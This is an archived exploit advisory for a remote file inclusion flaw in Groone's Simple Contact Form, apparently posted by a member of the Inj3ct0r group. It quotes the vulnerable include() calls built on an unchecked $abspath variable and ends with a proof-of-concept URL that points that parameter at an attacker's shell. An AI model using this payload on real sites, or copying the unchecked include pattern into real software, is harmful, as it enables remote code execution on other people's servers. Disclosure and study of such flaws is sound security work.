Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23966
HistoryMay 30, 2010 - 12:00 a.m.

Groone's Simple Contact Form (abspath) Remote File Inclusion Vulnerability

2010-05-3000:00:00
vulners.com
26

=====================================================================
Groone's Simple Contact Form (abspath) RFI Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \/
/\ \ /' _ `\ \/\ \/
/
\< /'
\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \
/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \
\\ \/\ \\ 0
0 \/
/\/
/\/
/\ \\ \/
/ \// \// \// \// 1
1 \ \
/ >> Exploit database separated by exploit 0
0 \/
/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Vendor: www.groonesworld.com
download: http://www.groonesworld.com/programs/contact/contact.zip
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

=====================================================================

Description:

Groone's World Development is a site dedicated to open source development; offering a
wide range of mostly free php scripts that will meet your needs.

    -=[ Vuln Code ]=-

[-] path/contact/contact.php

<?php
$abspath = "/home/user/public_html/contact/";

/*
This is groones contact form. It's a script that allows people to put a simple
contact form on their website
It can be downloaded from http://www.groonesworld.com/
License: GPL

    Thank you,  Russell H. Bennett, Jr.

*/

    include&#40;$abspath.&#39;inc/settings.inc.php&#39;&#41;;       // &lt;= 1

    --------

function mailok($usermsg) {
global $abspath;
include($abspath."inc/badwords.inc.php"); // <= 2

    $usermsg = strtoupper&#40;$usermsg&#41;;
    $tmpbad = strtoupper&#40;$badwords&#41;;
    $badwords = explode&#40;&quot;,&quot;,$tmpbad&#41;;
    $ding = &quot;GOOD&quot;;
    $i = 0;

    -=[ P0C ]=-

    http://127.0.0.1/path/contact/contact.php?abspath= [inj3ct0r sh3ll]

=========================| -=[ E0F ]=- |=========================